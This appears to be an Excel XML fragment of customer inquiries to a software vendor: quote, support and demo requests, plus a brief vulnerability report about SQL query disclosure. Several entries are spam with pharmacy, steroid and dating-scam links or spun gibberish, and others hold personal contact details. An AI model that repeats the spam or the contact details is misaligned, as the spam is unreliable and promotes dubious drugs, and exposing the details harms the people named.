•	ERP é o IFS versão 9_x000D_
•	Segue tabela de notas dos últimos 30 dias:_x000D_
_x000D_
Modelo	Tipo	Quantidade_x000D_
1	Entrada	45_x000D_
55	Entrada	3119_x000D_
NS	Entrada	2801_x000D_
7	Entrada	59_x000D_
6	Entrada	121_x000D_
22	Entrada	114_x000D_
57	Entrada	144_x000D_
21	Entrada	127_x000D_
29	Entrada	1_x000D_
55	Saída	1323_x000D_
NFS	Saída	80_x000D_
_x000D_
Obrigada!_x000D_
abs,</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.mandegar.asia/css/achieve.asp?once=312-Cheap-Boldenone-Oxandrolone-Price-Usa-Trenbolone-Pills/]Cheap Boldenone[/url]_x000D_
 In case your pet urinates from enjoyment upon your approaching residence or meeting new men and women, limit fondness up until the pooch relaxes downward. This should reduce the enjoyment she can feel and quit improper peeing well before it starts. If she does use the bathroom, wash it up quietly before you take her out. Do not stop the walk till she does some enterprise outside the house, and compliment overly. Stick with this, and she is going to learn that new everyone is not this kind of problem, all things considered._x000D_
  [url=http://www.mclain.co.uk/fonts/form.php?wiss=242]Kamagra Effet[/url]_x000D_
 To get a far better night's relax although expectant, there are several actions you can take. Restrict your consumption of body fluids later in the day to lessen nighttime restroom appointments. Nap at the beginning of the day so as to never disrupt your night resting. Keep crackers next to your your bed in the event you feel get up sensing nauseous in the center of the night time._x000D_
  [url=http://www.trisportsmanagement.co.uk/wp-content/list.php?a=183-Viagra-Female-Online,Levitra-Nz,Viagra-Generic-Cost]Viagra Female Online[/url]_x000D_
 Drinking is the top reason for liver organ many forms of cancer. Alcoholic beverages misuse with time can damage the liver in a manner that it could not any longer work. Without having a transplant, most liver cancer are fatal. Reduce your likelihood of liver organ malignancy by cutting down your consuming alcohol or removing it completely._x000D_
  [url=http://arcade.grendl.info/modules/mod_login/content.php?option=140-Hgh-Mangel-Jintropin-Wirkung-Getropin-Buy.html]Hgh Mangel[/url]_x000D_
</t>
  </si>
  <si>
    <t>Need to request My Support access.</t>
  </si>
  <si>
    <t xml:space="preserve">As a corporation PPG is moving towards the SAP Hybris suite as part of our IT strategic plan (1 to 2 years). _x000D_
However our Industrial Coatings SBU do not have a current DAM solution in place and are looking to implement Opentext DAM in advance of that SAP Hybris infrastructure being established. Is it possible in the short term (1 to 4 months) to stand up the DAM solution for a number of specific users without the SAP Hybris environment ? But knowing we would want to integrate with SAP Hybris in the long term (1 to 2 years) we would want to avoid throw away costs as much as possible. Could we schedule a demo of DAM link for our marketing management ? Thank you._x000D_
</t>
  </si>
  <si>
    <t>Olá,_x000D_
Pretendemos colocar uma RFP no mercado na próxima semana para aquisição de uma solução de GED/ECM._x000D_
Gostaria de saber para quem poderíamos enviar a RFP?_x000D_
Obrigado!</t>
  </si>
  <si>
    <t>We are interested in your Accreditation Server. DO you still market it ? If so, can you put us in contact with the appropriate person.</t>
  </si>
  <si>
    <t xml:space="preserve">WellCare has SharePoint. WellCare also has OpenText DM/eDocs. We need an eDocs adapter that will work with our SharePoint site so that we can search for documents from SharePoint and eDocs files will be searched as well._x000D_
You have this product on your website. (This text box will not allow me to link the URL - it's called 'OpenText eDocs for Microsoft SharePoint'.)_x000D_
Please contact me to discuss. Many thanks!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Ricoh Embedded Software Architecture (ESA)-work with Fax2Mail</t>
  </si>
  <si>
    <t xml:space="preserve">Need price quote for OpenText Livelink S/W Renewal_x000D_
Product #	Description	QTY_x000D_
S-LLPGECMDM	Document Management Full Named Users	13200_x000D_
S-LLWCM	LL Web Content Mgmt Server Contributor - IX - 1782	10200_x000D_
S-LLWCMCPU	LL ECM - WCM Server Productive CPU License	234_x000D_
S-PSOAPPEAR	Appearance XML	13200_x000D_
S-LLINTELLCLASS	Classifications Professional	13200_x000D_
S-LLCACHE	Remote Cache	13200_x000D_
S-SECURECONN	Secure Connect	13200_x000D_
S-SPDR	Spider	13200_x000D_
S-PSOXMLWF	XML Workflow Extensions	13200_x000D_
S-LLXMLWFLW	XML Workflow Interchange	13200_x000D_
S-LLESIGN	Electronic Signatures	13200_x000D_
S-LSDK	Content Server SDK (version 9.7.1 and earlier)	60_x000D_
S-PSOECOM	Livelink eCommunities	9200_x000D_
S-PSOWEBRPT	WebReports	13200_x000D_
S-LLWCMCT	LL WCM CONTENT SRV Contributer User Lic.	3000_x000D_
S-LLPGECMCLB	Collaboration Full Named Users	3000_x000D_
S-LLRMSECURITY	Livelink Security Clearance Module	3000_x000D_
S-LLCOMM	Communities Module	4000_x000D_
S-LLCONEMS	Eloquent Media Server Connector for Content Server	3000_x000D_
S-PSOEXSTGBK	DB Backup Validator	1_x000D_
S-LFC	Eloquent Media Server Full Named Users	13200_x000D_
S-LFCPUBLISH	Eloquent Media Server Publish for CD	100_x000D_
S-IXSPGCA	Archiving for Content Server	13200_x000D_
S-LLPGMSSP	CLM Services for SharePoint	12700_x000D_
S-ALBEXPRO	AdLib eXpress Server Professional Edition	5_x000D_
S-IXSEXTENDED	Extended 24x7 Support (IXOS)	1_x000D_
S-EXTENDED	Extended 24x7 Support Program	1_x000D_
</t>
  </si>
  <si>
    <t>I need to speak with someone about getting a quote for ApplicationXtender products for a bid I'm working. Dell directed me to OpenText. Who can I speak with to get this information?_x000D_
_x000D_
Thanks,_x000D_
gb</t>
  </si>
  <si>
    <t>Fax2Mail Registration</t>
  </si>
  <si>
    <t xml:space="preserve">My company is looking for a drawing viewer that supports both Autodesk and MicroStation formats. We would also want the ability for our field service technicians to batch plot multiple sheets of a drawing package instead of one sheet at a time._x000D_
Please let me know if this software package supports those features._x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am looking for the sell rep who is assisting Bayer U. S. LLC with the software renewals for GXS MESSAGING SERVICES. I would like to obtain a quote for Amendment Number BA092915. Last Year's PO was 2910444200_x000D_
_x000D_
Thank you, _x000D_
_x000D_
Colleen Dittman</t>
  </si>
  <si>
    <t xml:space="preserve">I worked for Recommind, which was acquired by Opentext. Where do I go for employment verification. </t>
  </si>
  <si>
    <t>Interested in your ECM product</t>
  </si>
  <si>
    <t>Dear All,_x000D_
_x000D_
I am Saverio Ombres, Management Consulting Manager at Deloitte Italy._x000D_
_x000D_
We are assessing your document management solution for an Italian financial service industry client, with asset/wealth management as core business._x000D_
Documentum solution is very interesting, covers many capabilities the client needs to manage documents archiving._x000D_
_x000D_
Could you please give us more information on:_x000D_
_x000D_
•	Solutions pricing (e.g. licensing, installation, implementation, system integration, application maintenance costs). We are not able to find any information on the website._x000D_
•	Availability of the solution for the EMEA and Italian market. Do you have some references in Italy and/or EMEA region?_x000D_
•	Salesforce integration and features: (i) Are your solution available on Salesforce appexchange? Otherwise, how the integration with Salesforce works? (ii) Could your solutions also be integrated in the Salesforce customer community?_x000D_
_x000D_
Thank you in advance for your willingness. We look forward to your feedback._x000D_
Do not hesitate to contact us for further information._x000D_
_x000D_
Kind Regard,_x000D_
Saverio Ombres</t>
  </si>
  <si>
    <t>My name is Arild Roland, salesmanager in a PC reseller company called Stepper AS. One of our customers is interested in buying some Exceed on demand lisences. Do you have a Norwegian distributor ? Where should we buy this ?</t>
  </si>
  <si>
    <t>Would like documentation on how to use Collections in Content Server.</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please send me a quote for OpenText Exceed 15 software for 16 users during 3 years? _x000D_
Thank you. </t>
  </si>
  <si>
    <t>Based in Abu Dhabi, we - Good Harbor (GH) have been working with our client (also in Abu Dhabi) for past couple of years, through a subcontractor (previous an authorised Encase dealer) to address a number of network security issues. _x000D_
_x000D_
One of the solutions our subcontractor pressed and sold to the client was an EnCase solution, which was purchased in 2015 (estimate). However, the client was going through a major transformation (both organisationally and technology) - which has recently concluded - therefore,  EnCase was never installed or implemented into the client network. _x000D_
_x000D_
At this time, our client has expressed their desire to move forward with implementation of EnCase. However, with the recent acquisition of Guidance and changes with EnCase, our subcontractor is NO longer affiliated with EnCase. _x000D_
_x000D_
This has put us in a difficult position with our client and we would like to discuss with OpenText some options to support our client with the implementation of EnCase. _x000D_
_x000D_
Please contact me at (email) daniel.lowe@ghiconsulting.net (tel.) +971 56 345 1064</t>
  </si>
  <si>
    <t>Licence Cost for VIM , ICC and Archive Server for 1 time implementation and Support</t>
  </si>
  <si>
    <t xml:space="preserve">Need to purchase Brava reader license (single seat $49 +$10) which support TFF images but logout page take us to Paypal option only and we need to use credit card for this purchase. </t>
  </si>
  <si>
    <t>Wir haben das CAQ-System Siemens QMS Professional erworben und benötigen eine Lizenz des Gupta Report Builder zur Anapassung der Reports. Kann man diese direkt bei Ihnen erwerben? Außerdem möchte ich  mich über eventuelle Support-Möglichkeiten informeren.</t>
  </si>
  <si>
    <t>I need to be able to download RightFax software _x000D_
SUID:            53715-12212_x000D_
_x000D_
Upgrade to RightFax 16.2_x000D_
_x000D_
Enduser:         London Borough of Bexley Steria Ltd BBC</t>
  </si>
  <si>
    <t>Ticket creation support_x000D_
I am not able to create a ticket support with my account, a confirmation mail need to be apply but after that my account is still without privileges to log a ticket.</t>
  </si>
  <si>
    <t xml:space="preserve">Can the following service be purchased from you directly?_x000D_
The Nelson Mandela University has the following services:_x000D_
• 12 FoIP Channel RightFax Business Server with MS Exchange Module _x000D_
• System I.D.: 20904-12100_x000D_
_x000D_
The current RightFax SUS plan expires on the 11 July 2018._x000D_
_x000D_
The Nelson Mandela University requires the following on the Rightfax Business Server with MS Exchange Module._x000D_
•	1 year RightFax SUS Renewal from 11 July 2018 to 11 July 2019 for 12 FoIP  Channel._x000D_
Software Update Subscription (SUS) includes_x000D_
•	Software full-version releases_x000D_
•	Point releases_x000D_
•	Product hot fixes and service packs_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Request for a price estimation/quotation, which is needed by our prospect for the 2019-IT budget proposal to the SKK Migas on Wednesday, 06 June 2018</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have an opportunity to work with OpenText for a project. Would you be able to link me up with your Singapore sales representative? Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Wir möchten unseren bestehenden Rechnungsprüfungs- und Freigabeprozess durch ein SAP integrierte Softwarelösung (weltweit) ablösen. Hierzu würden wir sehr gerne Ihre Software in einem vor Ort Termin kennenlernen. Bitte stimmen Sie hierzu einen Termin mit uns ab._x000D_
 </t>
  </si>
  <si>
    <t>Requesting for a partnership and support for a tender with Prices in Kenya.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear team,_x000D_
 _x000D_
My name is Jakub Simice and I am from J&amp;J company._x000D_
I received request # 01850723 to add the bank account (IBAN)  of the supplier  number  4255193780  OPEN TEXT AB._x000D_
 _x000D_
For the security reason I need you to approve the last four digits of the new EUR IBAN account …7240._x000D_
For the security reason I need you to approve the last four digits of the new SEK  IBAN account …7232._x000D_
_x000D_
 _x000D_
Thank you in advance._x000D_
Regards,_x000D_
Jakub_x000D_
_x000D_
_x000D_
Jakub Šimice_x000D_
R2P Associate_x000D_
Johnson &amp; Johnson_x000D_
Global Services - EMEA_x000D_
Walterovo náměstí 329/1_x000D_
158 00  Praha 5_x000D_
jsimice@its.jnj.com_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>perfect website Jarle Thorsen Unaico SiteTalk</t>
  </si>
  <si>
    <t xml:space="preserve">[center][URL="https://mityr-trans.com"][img]https://mityr-trans.com/wp-content/themes/mitur/images/object2065041431.jpg[/img][/URL][/center] _x000D_
[center][b][size=20][color=red]Наша компания оказывает услуги международных грузоперевозок на Ваших условиях !!![/color][/size][/b][/center] _x000D_
[center][b][size=20][color=red]Максимальные гарантии !!![/color][/size][/b][/center] _x000D_
[center][b][size=20][color=red]Кратчайшие сроки !!![/color][/size][/b][/center] _x000D_
[center][b][size=20][color=red]Лучшие цены !!![/color][/size][/b][/center] _x000D_
[center][b][size=20][color=blue]Основные маршруты по/из РФ - Омск, Томск, Челябинск, Екатеринбург, Новосибирск, Красноярск, Тюмень, Пермь[/color][/size][/b][/center] _x000D_
 _x000D_
 _x000D_
 _x000D_
[center][URL="https://mityr-trans.com"][img]https://mityr-trans.com/wp-content/themes/mitur/images/logo-1996480367.png[/img][/URL][/center] _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
недорогие международные грузоперевозки Омск отзывы_x000D_
международные грузоперевозки Россия Беларусь отзывы_x000D_
международные грузоперевозки Томск отзывы_x000D_
недорогие грузоперевозки Пермь_x000D_
недорогие грузоперевозки Челябинск отзывы_x000D_
грузоперевозки Россия Беларусь отзывы_x000D_
международные грузоперевозки Пермь отзывы_x000D_
международные грузоперевозки Тюмень отзывы_x000D_
недорогие грузоперевозки Россия Беларусь_x000D_
недорогие международные грузоперевозки Россия Казахстан отзывы_x000D_
недорогие международные грузоперевозки Омск_x000D_
грузоперевозки Новосибирск_x000D_
недорогие международные грузоперевозки Россия Беларусь отзывы_x000D_
недорогие грузоперевозки Томск отзывы_x000D_
недорогие грузоперевозки Россия Казахстан отзывы_x000D_
недорогие международные грузоперевозки Томск отзывы_x000D_
грузоперевозки Тюмень_x000D_
недорогие международные грузоперевозки Новосибирск_x000D_
международные грузоперевозки Омск_x000D_
международные грузоперевозки Красноярск_x000D_
</t>
  </si>
  <si>
    <t>Detgrghrh tyhtr</t>
  </si>
  <si>
    <t>I recently got a Magellan Roadmate2632T-LM GPS. Unfortunately I am unable to get it past the Magellan screen to enter any information. I did talk to online customer service and they were unable to start it either. They told me to contact you. I need assistance fixing this GPS as I have only used it once. Once I registered it it never worked again. Please advise</t>
  </si>
  <si>
    <t>Is easylink fax Hipaa compliant for sending basic PHI?</t>
  </si>
  <si>
    <t>i need help for my item pls</t>
  </si>
  <si>
    <t>Interest in RighFax._x000D_
Demo and a qoute</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, _x000D_
zusammen mit unserer Rechtsabteilung bin ich im Rahmen des Einkaufs auf der Suche nach einem System, dass unser zum Thema Contract Management unterstützt. Dabei stellen wir uns ein intelligentes Ablagesystem mit Erinnerungs/Suchfunktion vor, aber auch Unterstützung bei der Durchführung von Verhandlungen mit KI und elektronischer Unterschrift._x000D_
Ich würde mich über eine Kontaktaufnahme freuen._x000D_
_x000D_
Viele Grüße_x000D_
St. Emrich</t>
  </si>
  <si>
    <t>Need to receive 315 status messages (ocean) acknowledge and translate into mysql</t>
  </si>
  <si>
    <t>Hey,_x000D_
My name is Nir Alloush and I’m Head of Business Development at SITE123._x000D_
_x000D_
We will love to start a business cooperation between SITE123 and Opentext, so I am checking with you what is the process to get a link from the text:_x000D_
"create your own personal website" for example:_x000D_
_x000D_
/what-we-do/products/specialty-technologies/firstclass_x000D_
_x000D_
Hope we can do business together and start a long-term relationship._x000D_
_x000D_
Who are we?_x000D_
SITE123 developed a Simple to use website builder software, that gives small &amp; medium business owners the option to build their own website in minutes._x000D_
We take the world of website builder software one big step forward and we are here to change everything you've known about our field._x000D_
_x000D_
Best Regards,_x000D_
Nir Alloush_x000D_
Head of Business Development</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to deploy this system in my Group </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
Greetings from Petrorabigh!_x000D_
You are a registered vendor to our company and we need to migrate your profile to ARIBA platform. Kindly send us the name and e-mail of the person who will handle this update._x000D_
We look forward to hearing from you soon._x000D_
_x000D_
Best Regards,_x000D_
 _x000D_
Jeffrey Calapit, Supplier Development Processor  _x000D_
Procurement Department, Supplier Relations &amp; Local Content Section_x000D_
Building 552, Room 08_x000D_
Office: +966 12 425 8921 | Fax: +966 12 425 1978_x000D_
Jeffrey.Calapit@petrorabigh.com_x000D_
P.O. Box 101 | Rabigh 21911 | Saudi Arabia_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>[url=http://7go.su/blog/raskrutka-v-instagram-statya-sovety-oshibki-statistika.]как отключить продвижение  в инстаграм[/url] - какое приложение накручивает подписчиков в инстаграме, как собрать подписчиков в инстаграме.</t>
  </si>
  <si>
    <t>Apply for Director COE as I have those leadership skills</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Any updates about security vulnerability report ?_x000D_
_x000D_
Thanks,_x000D_
Muhammed Ashmil</t>
  </si>
  <si>
    <t>yxacmq@contmy.info</t>
  </si>
  <si>
    <t>Application for Channel Marketing Management Role _x000D_
Please keep me informed on marketing opportunities at Open Text.</t>
  </si>
  <si>
    <t xml:space="preserve">Новое лечение гепатита С в России, препараты для лечения гепатита С вы можете закзать у нас, консультация врача бесплатно _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/novosti/lichenie-gepatita/425/&gt;hepcinat lp купить в индии&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/]гепцинат отзывы лечение[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/550/&gt;тагриссо купить&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/550/]тагриссо[/url]_x000D_
</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
Please share the Quote for 1 License of Open Text Exstream  for 3 months ._x000D_
   _x000D_
•	Software Name: OpenText Exstream_x000D_
•	Publisher Name: OpenText         _x000D_
•	Software Edition: Latest edition &amp; version_x000D_
•	Number of License Required: 1 if multiuser access is possible_x000D_
•	Number of team members going to work on this: 5_x000D_
•	Duration for which this software is required: 3 months_x000D_
•	Software usage location : India_x000D_
_x000D_
Regards,_x000D_
Prathiba. G_x000D_
9482941674</t>
  </si>
  <si>
    <t>Need to know more about features and pricing options. Thank you.</t>
  </si>
  <si>
    <t>Dear Admin:_x000D_
 My notebook have two NETWORK CARD MAC. one is LAN card, Others is Wireless Card._x000D_
In Win 10, if LAN card is work, Wireless card will not get IP. But I always work between LAN card mode and Wirelss card mode. So my opentext desktop can not work very well.I do not change my LAN or Wireless LAN MAC. But if Wireless LAN Card does not get IP, there is the soft show:_x000D_
Invalid license._x000D_
Unable to load files._x000D_
_x000D_
The MAC address in the license does not match any MAC address on this computer._x000D_
How could I solve this problem?</t>
  </si>
  <si>
    <t>I am working on OpenText Exstream (HP Exstream) since 3 years. I want to do certification in this area. Need your guidance to get certified. _x000D_
1. Which course will be appropriate for me ?_x000D_
2. Which course is the basic one to start with ? _x000D_
_x000D_
Hope to get your response soon._x000D_
Thanks!!</t>
  </si>
  <si>
    <t>Seeking access under the Accenture agreement so that I can see knowledge base/learnings and tickets.</t>
  </si>
  <si>
    <t>I am looking for ApplicationXtender 7.0 SDK. Couldn't able to find the download link. Please help me in finding the downloadable link.</t>
  </si>
  <si>
    <t xml:space="preserve">We would love to sign up for BXS catalog. </t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I had booked a course scheduled originally for the 4th - 8th June._x000D_
_x000D_
Please can you quickly send me a response, if possible, to confirm if that is still going ahead?_x000D_
_x000D_
As i will need to book flights/accomodation._x000D_
_x000D_
A prompt response would be much appreciated._x000D_
_x000D_
thanks_x000D_
Lourdes</t>
  </si>
  <si>
    <t>I received an email from Open Text that was labeled a "Packing Slip" which contained 25 lines.  The serial number 1000027974 was on every line but the System ID is different for each line.  I tried to install Brava Desktop and during the install I am prompted for an email, Software ID and PIN?  I am not sure where I get the PIN And Software ID...  Your website is quite difficult to navigate.  Actually when I log in and try to go to "My Support" or "Change Password" or "Change Email Address" or "Update Profile" I just get sent back to the page to log in again.  Basically a never ending loop.  Please contact me and let me how we go about getting the needed info to install Brava Desktop.  Thank you.</t>
  </si>
  <si>
    <t>I recently changed my email address on the Open Text Website using Account Settings &gt; Change Email.  I was able to successfully change my email address and log in, but now I no longer have access to any of my support tickets.  Please resolve this ASAP as I have several Open Tickets.  _x000D_
_x000D_
Thanks, _x000D_
Janna</t>
  </si>
  <si>
    <t>I would like to know more about OpenText MediaBin and OpenText Media Management. We are currently working on OpenText Content Server 16._x000D_
_x000D_
Thank you,_x000D_
Kathleen</t>
  </si>
  <si>
    <t>Investigate new faxing options provided by RightFax.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am inquiring about your AppXtender product. We currently use the TRAKiT Community Development product from Superion. They have mentioned that there is an API available for the AppXtender product. I would like to have a demo and discuss the product to see if it can benefit our business needs. We are also using OpenText for our city wide document management system. I look forward to discussing this application with you soon._x000D_
_x000D_
Thank,_x000D_
Josie Suk_x000D_
720-898-7627</t>
  </si>
  <si>
    <t>OpenText integration and costs</t>
  </si>
  <si>
    <t>Examworks has a Brava Reader License. We needed to upgrade but installed the free version. Are you able to provide the software version that is a part of our License subscription?</t>
  </si>
  <si>
    <t>Please substitute "PlanetPress" with "Alchemy by Captarsis" in my previous inquiry._x000D_
_x000D_
Regards,_x000D_
Patrick MOTTIER.</t>
  </si>
  <si>
    <t>We are implementing Allscripts supply chain management and are interested in Writefax to work in conjunction with this application.  Looking for pricing.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
L'un de nos clients utilise PlanetPress._x000D_
Quelle cible proposez-vous pour en traiter l'obsolescence ?_x000D_
_x000D_
Salutations cordiales,_x000D_
Patrick MOTTIER.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to get three technicians certified and 1 ASP certified </t>
  </si>
  <si>
    <t>I'd like to updgrade to use mysupport as we have license and need help for it. please contact via email.</t>
  </si>
  <si>
    <t>Ich interessiere mich für die Lösung: OpenText Extended ECM for Microsoft Office 365. Kontaktieren Sie mich bitte.</t>
  </si>
  <si>
    <t>Dear  sir / madam,_x000D_
_x000D_
We, BTSoftware, did get a customer request for Gupta Team Developper 7.1._x000D_
_x000D_
Can you give us a price quote for this, including end-user pricing, reseller discount,_x000D_
delivery type, delivery time and payment conditions._x000D_
_x000D_
I'm looking forward to hear from you._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
Andre van Bezouw_x000D_
BTSoftware BV_x000D_
TPKL</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Currently, John Hancock is exploring options to replace ASG/Mobius ViewDirect content management product in our distributed environment .  We are currently seeking proposals that satisfy the following requirements:_x000D_
_x000D_
•	Ability to convert current midrange ASG report repository files_x000D_
•	Offer Repository that stores, links, indexes and archives content, in any format; provides multi-key, multilevel indexing to facilitate search and retrieval; and is built on a distributed Windows® architecture _x000D_
•	Ability for any recipient to view information online and print documents on network printers._x000D_
•	Provide a web-based GUI for authorized users with secure access (authentication via AD and optionally single sign on) to view all content stored anywhere in the enterprise, including AFP, PDF, XML, e-mail, HTML, images, text, rich media and more._x000D_
•	Option to view mainframe platform reports via GUI _x000D_
•	GUI compatibility with IE 11 and Edge_x000D_
•	GUI tool navigational capabilities – Folder structure (similar to MS Windows Explorer)_x000D_
•	Provide Keyword Search across reports/documents_x000D_
•	Define/manage report version retention policies (7,10,99 years)_x000D_
•	Ability to download report content to csv or xls formats_x000D_
•	Restrict access to certain parts for users or user groups_x000D_
•	Ability to send a report via automated email_x000D_
•	Ability to redact report lines/sections_x000D_
_x000D_
If your organization meets the above requirements, we are interested in engaging further information._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are a looking for a third party document management system.  I downloaded your product and Services catalog and am interested in the capabilities of the OpenText Communications Center Enterprise (CCE) option.  Would it be possible to have someone come out and do a demonstration for our team? </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Rahmen eines Projekts der REWE Group führe ich aktuell eine Marktanalyse zu modernen, zukunftssicheren ECM-Systemen durch. Ziel des Projekts ist die Etablierung eines neuen, voll digitalen Dokumentenmanagementprozesses, der standardisiert und fachprozessunabhängig ist und sich intelligent in unsere Systeme integrieren kann._x000D_
_x000D_
Da wir eine große Menge heterogener Geschäftsprozesse im Unternehmen haben, die in vielen Fällen dezentral und noch zwingend mit Papier arbeiten, ist unsere derzeitige ECM-Lösung (auf Basis IBM FileNet P8 und Kofax Capture) entsprechend weit "ausgefranst" und aufwändig in Support und Wartung. Wir möchten dem eine standardisierte neue Lösung entgegensetzen, die möglichst ohne Papier auskommt und im ersten Schritt anhand eines ausgewählten Fachprozesses in einer Pilotphase umgesetzt werden soll._x000D_
_x000D_
Ich möchte Sie bitten, uns Ihre Lösungsansätze und Best Practices für einen solchen generischen Musterprozess vorzustellen. Ich würde mich freuen, wenn Sie Kontakt mit mir aufnehmen würden, um Fragen zu klären und einen ersten Termin zu vereinbaren._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
_x000D_
Jan Schreiber_x000D_
REWE Systems GmbH_x000D_
Humboldtstraße 138-144 ▪ 51149 Köln_x000D_
Telefon: +49 221 149-2932_x000D_
E-Mail: Jan.Schreiber@rewe-group.com</t>
  </si>
  <si>
    <t xml:space="preserve">Want to know on the pricing details related to OpenText onpremise(not cloud) ECM &amp; BPM solution. Do you also have BPM Solutions(Workflow)?_x000D_
Is the pricing a User License based or a fixed price ones. </t>
  </si>
  <si>
    <t xml:space="preserve">Good Day,_x000D_
_x000D_
My name is Leona and I am writing from 6ixwebsoft, an Indian_x000D_
_x000D_
​ISO Certified, Google Partner​ company that specializes in SEO for small to medium companies and businesses. After running a report on your website with our software, we identified some big potential for improvements that, if implemented, can bring your website on the very first page of Google for a good number of relevant keywords._x000D_
_x000D_
Our company 6ixwebsoft Technology is a very well known Web Design Agency that has a proven method to achieve good results, through a lot of hard work and dedication My job is to work on your website design's shortcomings alongside my team._x000D_
_x000D_
If you are interested, let me know your phone no or skype ID. so we can have a quick call and I can send you an affordable quotation. _x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Leona Selden_x000D_
</t>
  </si>
  <si>
    <t>I‘d be interested to understand the capabilities of Decisv</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, We have local tender and want to know the prices and datasheets for:_x000D_
1. &lt;&lt;Tableau Forensic Card Reader&gt;&gt;  - 7pcs_x000D_
2. &lt;&lt;Tableau USB3 (T8u)&gt;&gt;  - 7pcs_x000D_
3. &lt;&lt;Tableau USB 3.0 IDE/SATA (T35u)&gt;&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, the company i work at is interested in using Eroom. Does this still exist? And if yes, is a demo available? Someone within the company saw it years ago and was quite impressed with how it was back then. Could you possibly contact with me with some details and possibly a demo or some more information on how it looks now?_x000D_
Thank you in advance, i look forward to receiving an email. </t>
  </si>
  <si>
    <t>god Robert Winston_x000D_
_x000D_
adept Winston to get know as the presenter of your body and in addition incredibly Human tv shows sequence, despite the fact that he sometimes oversees a world leading psychological libido evaluation organization. Robyn Williams predicts Winston in order to work they do by having sperm debris. Winston's employees recently had a leading highly effective relocating inspiring seed cellular matrix this testicles of one guy on the of one other. reveals people will turn into surrogate fathers holding another ejaculate and thus young fathering aren't his or her's genetically. for those who don't, might be he managed the body and superbly Human video tools but nonetheless,but nevertheless,on the contrary your canine is in point of fact an incredible researcher and at the present time a little bit of dramatic investigate to get into carrying ejaculation structure derived from one of masculine placing and these animals an additional._x000D_
_x000D_
Robyn Williams: So you check out orgasm from and organize them in an additional?_x000D_
_x000D_
adept Winston: one doesn't normally carry the sperm, You have some before penile herpes cells cellular matrix associated with spermatogonia may possibly be the old fashioned these companies the come cells basically and through these types of and you also also cells put them and into the phone testis, you'll be able to purchasing, at certain times are usually take, But there are plenty of woes getting them to to take. [url=https://www.reddit.com/r/idateasia/]idateasia scam[/url] once they do they ought to real quite a few for [url=http://www.fotolog.com/idateasia/168000000000021938/]idateasia.com[/url] a long time._x000D_
_x000D_
Robyn Williams: i'm able to remedy which it apple orgasm problem, i would personally be returning to adolescent yield._x000D_
_x000D_
lord [url=http://www.dailymotion.com/video/x11iksk_idateasia-review-scams_people]idateasia scam[/url] Winston: when i absolutely additional ways of living with orgasm complaints. hours this play with it may</t>
  </si>
  <si>
    <t>[url=https://goo.gl/j2vPXb]Сасое эффктивное средсво для быстрого снижиния излишнего веса[/url]</t>
  </si>
  <si>
    <t>Hi opentext security team,_x000D_
_x000D_
Vulnerability Description : During reconnaissance step i've found SQL query disclosure in appworks,apac,opentext,com (i can't include URL in this field so replaced dot with comma)_x000D_
_x000D_
Reproduction steps:_x000D_
_x000D_
1. Go to appworks,apac,opentext,com (i can't include URL in this field so replaced dot with comma)_x000D_
_x000D_
_x000D_
Impact:_x000D_
_x000D_
Information stored in the database is a prime target for attackers. Revealing information about the database structure through SQL queries will expose the application to severe threats like information theft._x000D_
_x000D_
Thank you for time and consideration you provided for reading my report._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Muhammed Ashmil</t>
  </si>
  <si>
    <t>Dear Sir/Mdm,_x000D_
_x000D_
I have one customer using XML-based import for Hummingbird DM(R) version 1.1 on the older version Windows server._x000D_
_x000D_
They are planning to upgrade the Windows server to Windows 2012 or latest version. _x000D_
_x000D_
However, the XML-based import for Hummingbird DM(R) version 1.1 only support Windows 2000, 2003 and XP._x000D_
_x000D_
So any new version for XML-based import for Hummingbird DM(R) version? Or any other agent replace it? Please kindly provide information, thanks_x000D_
_x000D_
B.R._x000D_
Andy Kwong</t>
  </si>
  <si>
    <t>Interested in the OpenText Provision application</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I am assisting a North America customer with their S/4HANA implementation._x000D_
_x000D_
They are going from ECC 6.0 EHP7 to S/4HANA 1709. _x000D_
_x000D_
They have the following Business Center Addons installed and we would confirmation if all of them are supported on S/4HANA 1709_x000D_
_x000D_
_x000D_
Addons : _x000D_
_x000D_
OTBCBAS                       0700_003  0001_x000D_
OTBCFND                       0700_003  0001_x000D_
OTBCINB                       0700_003  0001_x000D_
